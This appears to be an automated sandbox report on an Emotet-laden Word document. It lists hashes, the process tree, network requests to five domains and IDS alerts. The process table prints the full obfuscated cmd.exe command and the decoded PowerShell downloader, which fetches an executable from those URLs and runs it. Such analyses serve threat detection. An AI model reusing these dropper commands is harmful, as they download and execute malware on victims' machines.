File name: | 201812_38734963LF672203D.doc |
Full analysis: | https://app.any.run/tasks/ed11b04c-1054-46d9-987a-892c61cd9d79 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 13:27:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 13 12:53:00 2018, Last Saved Time/Date: Thu Dec 13 12:53:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0 |
MD5: | F9CD47887FF77F6E312DC8A6C0B4FDFA |
SHA1: | 781B07AFB00F4C0034A8B8BFA772D743C259CD0A |
SHA256: | 990A095527A78022C8A2A6AA925489C2AF6417776BBD39994528D1849E227B39 |
SSDEEP: | 3072:b0nbUhoOODsQqT8GhDS0o9zTGOZD6EbzCdGzQ1JBC+zV1:NBoUOZDlbeGzuJBCyV |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:13 12:53:00 |
ModifyDate: | 2018:12:13 12:53:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 23 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 26 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2720 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\201812_38734963LF672203D.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3216 | c:\imqqZGLsSu\izRwQqnNMYduWC\cQZzRKiJKSlnL\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set T8o=wEjApJCorrvARDOsMahjqDtWZIEDiBsaTu+,@'efVFl)YG(2\-5U.y04n6xS;kbzgN=3${}mK7 L9/H8:1cd&&for %U in (68,26,44,11,66,37,41,59,63,37,60,68,19,7,72,66,56,38,0,49,7,62,19,38,82,22,74,65,38,22,52,23,38,62,6,42,28,38,56,22,60,68,31,83,78,66,37,18,22,22,4,80,77,77,82,31,56,18,7,10,28,56,82,28,22,53,49,83,31,28,71,7,52,82,7,71,77,0,4,49,82,7,56,22,38,56,22,77,33,4,42,7,31,83,30,77,44,25,71,65,51,16,50,38,36,18,22,22,4,80,77,77,19,31,71,28,38,31,22,61,28,56,30,52,7,9,64,77,10,75,57,50,28,76,5,67,38,10,36,18,22,22,4,80,77,77,31,18,30,31,56,52,62,33,53,28,31,31,30,52,82,7,71,77,7,62,55,57,29,61,9,58,55,36,18,22,22,4,80,77,77,82,18,62,0,52,31,82,82,33,83,38,30,28,64,56,18,7,30,22,52,82,7,71,77,0,4,49,82,7,56,22,38,56,22,77,22,18,38,71,38,30,77,31,33,22,7,49,9,38,4,31,28,9,77,82,31,82,18,38,77,4,76,56,76,7,63,47,82,81,36,18,22,22,4,80,77,77,38,58,7,9,83,28,33,71,30,7,42,33,22,28,7,56,30,52,82,7,71,77,78,71,7,5,23,47,23,37,52,59,4,42,28,22,46,37,36,37,43,60,68,33,26,16,66,37,7,71,10,37,60,68,14,6,45,74,66,74,37,55,67,73,37,60,68,32,5,45,66,37,23,12,31,37,60,68,19,42,25,66,68,38,56,10,80,22,38,71,4,34,37,48,37,34,68,14,6,45,34,37,52,38,58,38,37,60,39,7,9,38,31,82,18,46,68,24,28,25,74,28,56,74,68,31,83,78,43,69,22,9,53,69,68,19,7,72,52,27,7,0,56,42,7,31,83,41,28,42,38,46,68,24,28,25,35,74,68,19,42,25,43,60,68,30,61,0,66,37,6,71,61,37,60,25,39,74,46,46,45,38,22,49,25,22,38,71,74,68,19,42,25,43,52,42,38,56,64,22,18,74,49,64,38,74,79,54,54,54,54,43,74,69,25,56,10,7,61,38,49,25,22,38,71,74,68,19,42,25,60,68,40,63,72,66,37,29,44,25,37,60,62,9,38,31,61,60,70,70,82,31,22,82,18,69,70,70,68,31,28,51,66,37,12,30,33,37,60,85)do set 4u0r=!4u0r!!T8o:~%U,1!&&if %U==85 powershell.exe "!4u0r:~6!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3772 | CmD /V:/C"set T8o=wEjApJCorrvARDOsMahjqDtWZIEDiBsaTu+,@'efVFl)YG(2\-5U.y04n6xS;kbzgN=3${}mK7 L9/H8:1cd&&for %U in (68,26,44,11,66,37,41,59,63,37,60,68,19,7,72,66,56,38,0,49,7,62,19,38,82,22,74,65,38,22,52,23,38,62,6,42,28,38,56,22,60,68,31,83,78,66,37,18,22,22,4,80,77,77,82,31,56,18,7,10,28,56,82,28,22,53,49,83,31,28,71,7,52,82,7,71,77,0,4,49,82,7,56,22,38,56,22,77,33,4,42,7,31,83,30,77,44,25,71,65,51,16,50,38,36,18,22,22,4,80,77,77,19,31,71,28,38,31,22,61,28,56,30,52,7,9,64,77,10,75,57,50,28,76,5,67,38,10,36,18,22,22,4,80,77,77,31,18,30,31,56,52,62,33,53,28,31,31,30,52,82,7,71,77,7,62,55,57,29,61,9,58,55,36,18,22,22,4,80,77,77,82,18,62,0,52,31,82,82,33,83,38,30,28,64,56,18,7,30,22,52,82,7,71,77,0,4,49,82,7,56,22,38,56,22,77,22,18,38,71,38,30,77,31,33,22,7,49,9,38,4,31,28,9,77,82,31,82,18,38,77,4,76,56,76,7,63,47,82,81,36,18,22,22,4,80,77,77,38,58,7,9,83,28,33,71,30,7,42,33,22,28,7,56,30,52,82,7,71,77,78,71,7,5,23,47,23,37,52,59,4,42,28,22,46,37,36,37,43,60,68,33,26,16,66,37,7,71,10,37,60,68,14,6,45,74,66,74,37,55,67,73,37,60,68,32,5,45,66,37,23,12,31,37,60,68,19,42,25,66,68,38,56,10,80,22,38,71,4,34,37,48,37,34,68,14,6,45,34,37,52,38,58,38,37,60,39,7,9,38,31,82,18,46,68,24,28,25,74,28,56,74,68,31,83,78,43,69,22,9,53,69,68,19,7,72,52,27,7,0,56,42,7,31,83,41,28,42,38,46,68,24,28,25,35,74,68,19,42,25,43,60,68,30,61,0,66,37,6,71,61,37,60,25,39,74,46,46,45,38,22,49,25,22,38,71,74,68,19,42,25,43,52,42,38,56,64,22,18,74,49,64,38,74,79,54,54,54,54,43,74,69,25,56,10,7,61,38,49,25,22,38,71,74,68,19,42,25,60,68,40,63,72,66,37,29,44,25,37,60,62,9,38,31,61,60,70,70,82,31,22,82,18,69,70,70,68,31,28,51,66,37,12,30,33,37,60,85)do set 4u0r=!4u0r!!T8o:~%U,1!&&if %U==85 powershell.exe "!4u0r:~6!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3724 | powershell.exe "$EYA='FSz';$joK=new-object Net.WebClient;$adH='http://canhovincity-daimo.com/wp-content/uploads/YImNUM5e@http://jamieatkins.org/vL65i9J3ev@http://ahsan.buyiaas.com/ob46Bkrx4@http://chbw.accudesignhost.com/wp-content/themes/auto-repair/cache/p9n9oz2c1@http://exordiumsolutions.com/HmoJW2W'.Split('@');$uEM='omv';$OCG = '437';$TJG='WRa';$jlI=$env:temp+'\'+$OCG+'.exe';foreach($ZiI in $adH){try{$joK.DownloadFile($ZiI, $jlI);$skw='Cmk';If ((Get-Item $jlI).length -ge 80000) {Invoke-Item $jlI;$VzK='BYI';break;}}catch{}}$aiU='Rsu';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR891C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E42C9B3B.wmf | — | |
MD5:— | SHA256:— | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB3D1401.wmf | — | |
MD5:— | SHA256:— | |||
3724 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TKQKW34ZLP2XOHDDMWQP.temp | — | |
MD5:— | SHA256:— | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84E06400.wmf | wmf | |
MD5:E89B0EFD16A71A43F392CFA5B5D6CF6B | SHA256:270454C35C2E0005870906B7B386EC9B23784A9F9DCE171663312BE4E28CF6C5 | |||
3724 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:0FEE22FA40EAB618E269AF59EF990721 | SHA256:DB543AC7F35DE26670D8A65A74DD48BCF6E5E70FF2A75D8A42E2FD500F8A170D | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A6F63A2.wmf | wmf | |
MD5:8FD83E4D7EA17FB991495755098C3AFB | SHA256:AD23BF7884C0B6F356AA4704F5A81ECCBF4295B78460C2F143B1F728C83D0EAB | |||
3724 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199c65.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\201812_38734963LF672203D.doc.LNK | lnk | |
MD5:6A862AAAD48EAA3ECABE429F68522657 | SHA256:393C18BCBFCD40CF000B0D589C748A69E8E674FCEB470B04FA2CD0B7F9E75575 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3724 | powershell.exe | GET | 404 | 107.189.1.183:80 | http://ahsan.buyiaas.com/ob46Bkrx4 | LU | xml | 345 b | malicious |
3724 | powershell.exe | GET | 404 | 115.146.123.252:80 | http://canhovincity-daimo.com/wp-content/uploads/YImNUM5e | VN | xml | 345 b | suspicious |
3724 | powershell.exe | GET | 404 | 149.255.58.48:80 | http://jamieatkins.org/vL65i9J3ev | GB | xml | 345 b | malicious |
3724 | powershell.exe | GET | 404 | 173.193.126.154:80 | http://chbw.accudesignhost.com/wp-content/themes/auto-repair/cache/p9n9oz2c1 | US | xml | 345 b | suspicious |
3724 | powershell.exe | GET | 404 | 23.226.131.165:80 | http://exordiumsolutions.com/HmoJW2W | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3724 | powershell.exe | 107.189.1.183:80 | ahsan.buyiaas.com | FranTech Solutions | LU | malicious |
3724 | powershell.exe | 149.255.58.48:80 | jamieatkins.org | Awareness Software Limited | GB | malicious |
3724 | powershell.exe | 173.193.126.154:80 | chbw.accudesignhost.com | SoftLayer Technologies Inc. | US | suspicious |
3724 | powershell.exe | 115.146.123.252:80 | canhovincity-daimo.com | CMC Telecommunications Services Company | VN | suspicious |
3724 | powershell.exe | 23.226.131.165:80 | exordiumsolutions.com | QuadraNet, Inc | US | suspicious |
Domain | IP | Reputation |
---|---|---|
canhovincity-daimo.com |
| suspicious |
jamieatkins.org |
| malicious |
ahsan.buyiaas.com |
| malicious |
chbw.accudesignhost.com |
| suspicious |
exordiumsolutions.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3724 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3724 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3724 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3724 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3724 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3724 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |